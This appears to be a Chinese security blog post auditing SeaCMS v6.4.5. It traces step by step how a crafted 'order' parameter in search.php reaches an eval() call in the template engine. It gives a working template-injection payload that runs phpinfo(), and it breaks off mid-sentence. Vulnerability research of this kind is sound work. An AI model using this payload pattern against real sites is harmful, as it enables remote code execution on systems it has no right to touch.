
<!DOCTYPE html>
<html lang="zh-CN">

<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>seacms_getshell 篇 - 你好我是王日天@</title>
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate">
  
  <meta name="keywords" content="zhaoo,"> 
  
  <meta name="description" content="record_of_mylife,1@ 前言换回我的 小deepin了，还是熟悉的味道，..."> 
  
  <meta name="author" content="rt95"> 
  <link rel="shortcut icon" href="/image/favicon.png">
  <link rel="stylesheet" href="/css/style.css">

  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_58xq2j9v1id.css">
  

  
  
  <link rel="stylesheet" href="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css">
  

  
  
  <link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-light.min.css">
  

  
  
  <link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css">
  

  <script>
    var CONFIG = window.CONFIG || {}
    CONFIG = {
      fancybox: true,
      pjax: false,
      lazyload: true,
      donate_alipay: '/image/95.jpg',
      donate_wechat: '/image/95.jpg',
      gitalk: {
        enable: false,
        clientID: '',
        clientSecret: '',
        id: window.location.pathname,
        repo: '',
        owner: '',
        admin: ''
      },
      motto: {
        api: '',
        default: ''
      },
      galleries: {
        enable: 'true'
      }
    }
  </script>

  

</head></html>
<body class="lock-screen">
  <div class="loading"></div>
  <nav class="menu">
  <div class="menu-close">
    <i class="iconfont iconplus"></i>
  </div>
  <ul class="menu-content">
    
    
    
    
    <li class="menu-item"><a href="/ "> 首页</a></li>
    
    
    
    
    <li class="menu-item"><a href="/archives "> 归档</a></li>
    
    
    
    
    <li class="menu-item"><a href="/links "> links</a></li>
    
    
    
    
    <li class="menu-item"><a href="/about "> 关于</a></li>
    
  </ul>
  <div class="menu-copyright"><p>Copyright© 2019-2020 | <a target="_blank" href="https://www.izhaoo.com">zhaoo</a> .AllRightsReserved</p></div>
</nav>
  <main id="main">
  <div class="container" id="container">
    <article class="article">
  <section class="head">
  <img      class="lazyload" data-original="/image/post-image.jpg"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="     draggable="false">
  <div class="head-mask">
    <h1 class="head-title">seacms_getshell 篇</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>2019-08-17</span
        class="post-info-item">
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>13889</span>
    </div>
  </div>
</section>
  <section class="main">
    <section class="content">
      <h2 id="1-前言"><a href="#1-前言" class="headerlink" title="1@ 前言"></a>1@ 前言</h2><p>换回我的 <strong>小deepin了</strong>，还是熟悉的味道，哈哈。配好所有之前的环境后，开始审计 ：）</p>
<p>文章撰写时的审计环境：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs undefined">server : phpstudy<span class="hljs-built_in"><br>system </span>: win10<br></code></pre></td></tr></table></figure>

<h2 id="2-seacms-各个版本的-getshell"><a href="#2-seacms-各个版本的-getshell" class="headerlink" title="2@ seacms 各个版本的 getshell"></a>2@ seacms 各个版本的 getshell</h2><h3 id="1-v-6-4-5-前台-getshell"><a href="#1-v-6-4-5-前台-getshell" class="headerlink" title="1. v_6.4.5 前台 getshell"></a>1. v_6.4.5 前台 getshell</h3><ul>
<li>漏洞文件 <strong>upload/search.php</strong></li>
</ul>
<p>我以为，初学审计的时候可以先看 payload，然后通过给出构造的参数形式了进行顺藤摸瓜。毕竟各大漏洞平台一般较不详细的时候也会给出几条简单的 poc_payload。我们先来看看这个版本的前台 getshell 的 payload。</p>
<p><code>http://IP/upload/search.php?searchtype=5&amp;order=}{end if}{if:1)phpinfo();if(1}{end if}</code></p>
<h4 id="1-1-恶意-payload-的追踪"><a href="#1-1-恶意-payload-的追踪" class="headerlink" title="1.1 恶意 payload 的追踪"></a>1.1 恶意 payload 的追踪</h4><p>​         首先，我们从上面的 payload 可以知晓可控参数为 <strong>searchtype</strong> 和 <strong>order</strong>，我们可以跟着 xdebug 完整的走一遍，较为清楚的了解漏洞存在的原因，和漏洞触发的条件（只列出漏洞相关的部分，相关逻辑功能的完成在这不细究）。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">require_once</span>(<span class="hljs-string">"include/common.php"</span>);<br><span class="hljs-keyword">require_once</span>(sea_INC.<span class="hljs-string">"/main.class.php"</span>);<br></code></pre></td></tr></table></figure>

<p>文件开头包含了两个处理方法与处理参数的文件，其中 GPC 变量的传入的文件就包含在 <strong>common.php</strong>中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">foreach</span>(<span class="hljs-keyword">Array</span>(<span class="hljs-string">'_GET'</span>,<span class="hljs-string">'_POST'</span>,<span class="hljs-string">'_COOKIE'</span>) <span class="hljs-keyword">as</span> $_request)<br>&#123;<br>	<span class="hljs-keyword">foreach</span>($$_request <span class="hljs-keyword">as</span> $_k =&gt; $_v) $&#123;$_k&#125; = _RunMagicQuotes($_v);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这段 <strong>common.php</strong> 文件中的代码，将外部的 GPC 参数进行 php 代码层的赋值。</p>
<p>再回到 <strong>search.php</strong>，来看看漏洞的直接关键点 <strong>echoSearchpage()</strong> 函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">global</span> $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;<br>$order = !<span class="hljs-keyword">empty</span>($order)?$order:time;<br></code></pre></td></tr></table></figure>

<p>函数开头将一些变量引用为全局变量，在函数内部使用。由第二句 order 变量的赋值，结合之前的外部变量赋值的方法，我们可以传入 order 参数进行变量覆盖。由 payload 可知，order字段里面是存在关键字眼 <strong>phpinfo()</strong>的，之后一定是经过了一系列的拼接和过滤，得到执行，我们在整个漏洞利用的在这条链里面就要紧盯着 order 参数的 <code>&#39;成长历程&#39;</code>。payload中的另一个参数是 searchtype ，赋值为5，所以我们跳转到代码的 65~76行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(intval($searchtype)==<span class="hljs-number">5</span>)<br>	&#123;<br>		$searchTemplatePath = <span class="hljs-string">"/templets/"</span>.$GLOBALS[<span class="hljs-string">'cfg_df_style'</span>].<span class="hljs-string">"/"</span>.$GLOBALS[<span class="hljs-string">'cfg_df_html'</span>].<span class="hljs-string">"/cascade.html"</span>;<br>		$typeStr = !<span class="hljs-keyword">empty</span>($tid)?intval($tid).<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$yearStr = !<span class="hljs-keyword">empty</span>($year)?PinYin($year).<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$letterStr = !<span class="hljs-keyword">empty</span>($letter)?$letter.<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$areaStr = !<span class="hljs-keyword">empty</span>($area)?PinYin($area).<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$orderStr = !<span class="hljs-keyword">empty</span>($order)?$order.<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$jqStr = !<span class="hljs-keyword">empty</span>($jq)?$jq.<span class="hljs-string">'_'</span>:<span class="hljs-string">'0_'</span>;<br>		$cacheName=<span class="hljs-string">"parse_cascade_"</span>.$typeStr.$yearStr.$letterStr.$areaStr.$orderStr; <span class="hljs-comment">//构建cacheName</span><br>		$pSize = getPageSizeOnCache($searchTemplatePath,<span class="hljs-string">"cascade"</span>,<span class="hljs-string">""</span>);  <span class="hljs-comment">//获取输出页面大小</span><br></code></pre></td></tr></table></figure>

<p>这段代码的大致意思是构造好模板文件的文件名，第一句得到构造模板文件的默认格式的文件名</p>
<p><code>/templets/default/html/cascade.html</code></p>
<p>然后开始拼接模板文件名，由于以上参数传入都为空，则由选择语句知道我们的最终文件名变量 $cacheName为:</p>
<p><code>parse_cascade_0_0_0_0_}{end if} {if:1)phpinfo();if(1}{end if}_</code></p>
<p><strong>psize</strong> 是输出文件页面的大小，默认在缓存文件里面保存，值为24.</p>
<p>由于其他相关参数都为空，我们直接跟进到文件的第 145 行，来查看模板文件的处理方式。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>($cfg_iscache)&#123;<br>		<span class="hljs-keyword">if</span>(chkFileCache($cacheName))&#123;<br>			$content = getFileCache($cacheName);<br>		&#125;<span class="hljs-keyword">else</span>&#123;<br>			$content = parseSearchPart($searchTemplatePath);<br>			setFileCache($cacheName,$content);<br>		&#125;<br>	&#125;<span class="hljs-keyword">else</span>&#123;<br>			$content = parseSearchPart($searchTemplatePath);<br>	&#125;<br></code></pre></td></tr></table></figure>

<p>变量 $cfg_iscache 默认传入为 1，所以我们跟进到 <strong>chkFileCache()</strong>函数里面。</p>
<ul>
<li>文件 /upload/include/inc/common_func.php</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">chkFileCache</span><span class="hljs-params">($cacheName)</span><br></span>&#123;<br>	<span class="hljs-keyword">global</span> $cfg_cachetime,$cfg_cachemark;<br>	$cacheFile=sea_ROOT.<span class="hljs-string">'/data/cache/'</span>.$cfg_cachemark.$cacheName.<span class="hljs-string">'.inc'</span>;<br>	$mintime = time() - $cfg_cachetime*<span class="hljs-number">60</span>;<br>	<span class="hljs-keyword">if</span>(!file_exists($cacheFile) || ( file_exists($cacheFile) &amp;&amp; ($mintime &gt; filemtime($cacheFile))))&#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-keyword">false</span>;<br>	&#125;<span class="hljs-keyword">else</span>&#123;<br>		<span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里的逻辑理解的关键点就在这句</p>
<p><code>if(!file_exists($cacheFile) || ( file_exists($cacheFile) &amp;&amp; ($mintime &gt; filemtime($cacheFile))))</code></p>
<p>我们在这设一个 $test 变量 </p>
<p> <img    class="lazyload" data-original="https://raw.githubusercontent.com/59lx/userful_photo/master/myblog_photos/seacms_getshell/1.png"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    alt="1564321031968"></p>
<p>看到这里是返回 false 的，由格式来看，只能是两边的判断式都为假时，最终的布尔值才会为假。所以，file_exists($cacheFile) 是成立的，也就是说，文件<code>D:/WWW/seacms_v6.4/upload/data/cache/E20121213155816parse_cascade_0_0_0_0_}{end if} {if:1)phpinfo();if(1}{end if}_.inc</code> 存在。但实际上从本地来看，这个文件并不存在，只有一个相似的被截断的文件名 <code>E20121213155816parse_cascade_0_0_0_0_}{end if} {if</code> 存在，这是因为出现的 if 后面的冒号将文件名截断。但是 file_exists 函数仍然判断源文件存在。这想来是件很有趣的事情啊，这就引出来对 file_exists() 与 文件关系的讨论。</p>
<h5 id="1-2-1-有趣的-file-exists-和-ntfs-文件系统"><a href="#1-2-1-有趣的-file-exists-和-ntfs-文件系统" class="headerlink" title="1.2.1 有趣的 file_exists()  和 ntfs 文件系统"></a>1.2.1 有趣的 file_exists()  和 ntfs 文件系统</h5><p>除了上面的那个情况外，还有一个点也能证明这个被截断文件名的文件是真实存在的。</p>
<p><img    class="lazyload" data-original="https://raw.githubusercontent.com/59lx/userful_photo/master/myblog_photos/seacms_getshell/2.png"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    alt="1564363773307"></p>
<p>思考一下：是否存在这种情况，操作系统的文件系统将文件写入的数据流保存到一个位置，但是显示的文件名是以它的命名规则显示，而真正的文件名是与写入数据流相互关联，可以用底层的编程语言打开那个完整文件名的文件，获取数据流？</p>
<p>搜索无果后，在 p 神小密圈发问，得到了师傅们的指导，了解了一下 ntfs 文件系统。</p>
<p>更多关于 ntfs 文件系统中的隐藏流的知识，请见我的另一篇博客：<a href="https://www.59wlx.top/2019/08/17/ntfs%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%9A%84ADS%E4%BE%9B%E9%80%89%E6%95%B0%E6%8D%AE%E6%B5%81/" target="_blank" rel="noopener">ntfs 系统中的ADS供选数据流</a></p>
<h5 id="1-2-2-继续跟踪审计"><a href="#1-2-2-继续跟踪审计" class="headerlink" title="1.2.2 继续跟踪审计"></a>1.2.2 继续跟踪审计</h5><p>好了，解决完上面的问题，我们接着来看审计。</p>
<p>当我们第一次构造 payload 进行访问时，是不存在那个模板文件的，那么代码会走到另一个分支。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>($cfg_iscache)&#123;<br>		<span class="hljs-keyword">if</span>(chkFileCache($cacheName))&#123;<br>			$content = getFileCache($cacheName);<br>		&#125;<span class="hljs-keyword">else</span>&#123;<br>			$content = parseSearchPart($searchTemplatePath);<br>			setFileCache($cacheName,$content);<br>		&#125;<br>	&#125;<br></code></pre></td></tr></table></figure>

<p>在 chkFileCache() 函数返回 false 后，进入到 else 分支 ,执行获取 $content, 并对搜索的不存在模板文件进行写入。这也是我们之后访问那个模板文件中内容的由来，即可以一次或多次执行 phpinfo()。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parseSearchPart</span><span class="hljs-params">($templatePath)</span><br></span>&#123;<br>	<span class="hljs-keyword">global</span> $mainClassObj,$tid;<br>	$currentTypeId = <span class="hljs-keyword">empty</span>($tid)?<span class="hljs-number">0</span>:$tid;<br>	$content=loadFile(sea_ROOT.$templatePath);<br>	$content=$mainClassObj-&gt;parseTopAndFoot($content);<br>	$content=$mainClassObj-&gt;parseAreaList($content);<br>	$content=$mainClassObj-&gt;parseHistory($content);<br>	$content=$mainClassObj-&gt;parseSelf($content);<br>	$content=$mainClassObj-&gt;parseGlobal($content);<br>	$content=$mainClassObj-&gt;parseMenuList($content,<span class="hljs-string">""</span>,$currentTypeId);<br>	$content=$mainClassObj-&gt;parseVideoList($content,$currentTypeId);<br>	$content=$mainClassObj-&gt;parsenewsList($content,$currentTypeId);<br>	$content=$mainClassObj-&gt;parseTopicList($content);<br>	<span class="hljs-keyword">return</span> $content;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这个函数获取模板文件的默认格式，然后进行替换赋值。</p>
<p>之后就进入到了关键的模板内容替换的部分：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">$content = str_replace(<span class="hljs-string">"&#123;searchpage:page&#125;"</span>,$page,$content);<br>	<span class="hljs-keyword">echo</span> $content;<br>	$content = str_replace(<span class="hljs-string">"&#123;seacms:searchword&#125;"</span>,$searchword,$content);<br>	$content = str_replace(<span class="hljs-string">"&#123;seacms:searchnum&#125;"</span>,$TotalResult,$content);<br>	$content = str_replace(<span class="hljs-string">"&#123;searchpage:ordername&#125;"</span>,$order,$content);<br>......<br></code></pre></td></tr></table></figure>

<p>我只列出我们可控的部分，关键就在 $order 这个参数，我们结合 $content 获取到的模板文件的内容，来观察替换后的亚子。模板内容如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"&#123;searchpage:order-time-link&#125;"</span> &#123;<span class="hljs-attr">if:</span>"&#123;<span class="hljs-attr">searchpage:ordername</span>&#125;"==<span class="hljs-string">"time"</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-success"</span> &#123;<span class="hljs-attr">else</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-default"</span> &#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125; <span class="hljs-attr">id</span>=<span class="hljs-string">"orderhits"</span>&gt;</span>最新上映<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"&#123;searchpage:order-hit-link&#125;"</span> &#123;<span class="hljs-attr">if:</span>"&#123;<span class="hljs-attr">searchpage:ordername</span>&#125;"==<span class="hljs-string">"hit"</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-success"</span> &#123;<span class="hljs-attr">else</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-default"</span> &#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125; <span class="hljs-attr">id</span>=<span class="hljs-string">"orderaddtime"</span>&gt;</span>最近热播<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"&#123;searchpage:order-score-link&#125;"</span> &#123;<span class="hljs-attr">if:</span>"&#123;<span class="hljs-attr">searchpage:ordername</span>&#125;"==<span class="hljs-string">"score"</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-success"</span> &#123;<span class="hljs-attr">else</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-default"</span> &#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125; <span class="hljs-attr">id</span>=<span class="hljs-string">"ordergold"</span>&gt;</span>评分最高<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>可以看到，模板文件中有3次出现 ordername，这也就可以解释为什么 payload 触发漏洞之后，执行了三次 phpifno()</p>
<p>结合我们的 payload，我们可以知道模板文件替换位置最终的形式如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"&#123;searchpage:order-time-link&#125;"</span> &#123;<span class="hljs-attr">if:</span>"&#125;&#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125;&#123;<span class="hljs-attr">if:1</span>)<span class="hljs-attr">phpinfo</span>();<span class="hljs-attr">if</span>(<span class="hljs-attr">1</span>&#125;&#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125;"==<span class="hljs-string">"time"</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-success"</span> &#123;<span class="hljs-attr">else</span>&#125; <span class="hljs-attr">class</span>=<span class="hljs-string">"btn btn-default"</span> &#123;<span class="hljs-attr">end</span> <span class="hljs-attr">if</span>&#125; <span class="hljs-attr">id</span>=<span class="hljs-string">"orderhits"</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里的 <code>}</code>,作用就是在 eval 的时候保证逻辑与语法的正确性，保证之后的代码可以被正确执行。</p>
<p>模板文件内容替换后，进入到最最关键的一步：</p>
<p><code>$content=$mainClassObj-&gt;parseIf($content);</code></p>
<p>跟进到 parseIf 函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parseIf</span><span class="hljs-params">($content)</span></span>&#123;<br>		<span class="hljs-keyword">if</span> (strpos($content,<span class="hljs-string">'&#123;if:'</span>)=== <span class="hljs-keyword">false</span>)&#123;<br>		<span class="hljs-keyword">return</span> $content;<br>		&#125;<span class="hljs-keyword">else</span>&#123;<br>		<span class="hljs-comment">// echo $content;</span><br>		$labelRule = buildregx(<span class="hljs-string">"&#123;if:(.*?)&#125;(.*?)&#123;end if&#125;"</span>,<span class="hljs-string">"is"</span>);<br>		$labelRule2=<span class="hljs-string">"&#123;elseif"</span>;<br>		$labelRule3=<span class="hljs-string">"&#123;else&#125;"</span>;<br>		preg_match_all($labelRule,$content,$iar);<br>		$arlen=count($iar[<span class="hljs-number">0</span>]);<br>		<span class="hljs-comment">// var_dump($iar[0]);</span><br>		$elseIfFlag=<span class="hljs-keyword">false</span>;<br>		<span class="hljs-keyword">for</span>($m=<span class="hljs-number">0</span>;$m&lt;$arlen;$m++)&#123;<br>			$strIf=$iar[<span class="hljs-number">1</span>][$m];<br>			$strIf=<span class="hljs-keyword">$this</span>-&gt;parseStrIf($strIf);<br>			$strThen=$iar[<span class="hljs-number">2</span>][$m];<br>			$strThen=<span class="hljs-keyword">$this</span>-&gt;parseSubIf($strThen);<br>			<span class="hljs-keyword">if</span> (strpos($strThen,$labelRule2)===<span class="hljs-keyword">false</span>)&#123;<br>				<span class="hljs-keyword">if</span> (strpos($strThen,$labelRule3)&gt;=<span class="hljs-number">0</span>)&#123;<br>					$elsearray=explode($labelRule3,$strThen);<br>					$strThen1=$elsearray[<span class="hljs-number">0</span>];<br>					$strElse1=$elsearray[<span class="hljs-number">1</span>];<br>					@<span class="hljs-keyword">eval</span>(<span class="hljs-string">"if("</span>.$strIf.<span class="hljs-string">")&#123;\$ifFlag=true;&#125;else&#123;\$ifFlag=false;&#125;"</span>);<br></code></pre></td></tr></table></figure>

<p>由正则式可知 $iar[0] 数组得到的是所有满足 <code>{if:【内容】}【内容】{end if}</code> 这种形式的匹配结果</p>
<p>回头来看看我们刚刚替换后的关键部分的模板内容：</p>
<p><code>&lt;a href=&quot;{searchpage:order-time-link}&quot; {if:&quot;}{end if}{if:1)phpinfo();if(1}{end if}&quot;==&quot;time&quot;}</code></p>
<p>是满足匹配规则的，重要内容保存在 $iar[1]中。这里我们直接定位到最终执行 payload 的语句中。</p>
<p><code>@eval(&quot;if(&quot;.$strIf.&quot;){\$ifFlag=true;}else{\$ifFlag=false;}&quot;);</code></p>
<p>跟踪 $strIf 变量，经过了两次处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">$strIf=$iar[<span class="hljs-number">1</span>][$m];<br>$strIf=<span class="hljs-keyword">$this</span>-&gt;parseStrIf($strIf);<br></code></pre></td></tr></table></figure>

<p>上面说过，最终的 payload 关键内容会保存在 $iar[1] 中，所以经过 for 遍历，$strIf 一定可以被赋值为带有 phpinfo() 的字符串。</p>
<p>跟进到 parseStrIf() 函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">parseStrIf</span><span class="hljs-params">($strIf)</span><br></span>&#123;<br>	<span class="hljs-keyword">if</span>(strpos($strIf,<span class="hljs-string">'='</span>)===<span class="hljs-keyword">false</span>)<br>	&#123;<br>		<span class="hljs-keyword">return</span> $strIf;<br>	&#125;<br>	<span class="hljs-keyword">if</span>((strpos($strIf,<span class="hljs-string">'=='</span>)===<span class="hljs-keyword">false</span>)&amp;&amp;(strpos($strIf,<span class="hljs-string">'='</span>)&gt;<span class="hljs-number">0</span>))<br>	&#123;<br>		$strIf=str_replace(<span class="hljs-string">'='</span>, <span class="hljs-string">'=='</span>, $strIf);<br>	&#125;<br>	$strIfArr =  explode(<span class="hljs-string">'=='</span>,$strIf);<br>	<span class="hljs-keyword">return</span> (<span class="hljs-keyword">empty</span>($strIfArr[<span class="hljs-number">0</span>])?<span class="hljs-string">'NULL'</span>:$strIfArr[<span class="hljs-number">0</span>]).<span class="hljs-string">"=="</span>.(<span class="hljs-keyword">empty</span>($strIfArr[<span class="hljs-number">1</span>])?<span class="hljs-string">'NULL'</span>:$strIfArr[<span class="hljs-number">1</span>]);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>当下我们的 $strIf 为 <code>1)phpinfo();if(1</code></p>
<p>其中没有 <strong>=</strong> ，所以直接返回原内容。所以最后 eval() 函数执行的内容就为</p>
<p><code>@eval(&quot;if(1)phpinfo();if(1){\$ifFlag=true;}else{\$ifFlag=false;}&quot;);</code></p>
<p>代码就会顺利得到执行。</p>
<p>这里纠正一下引用文章的一个说法，<code>$labelRule = buildregx(&quot;{if:(.*?)}(.*?){end if}&quot;,&quot;is&quot;);</code></p>
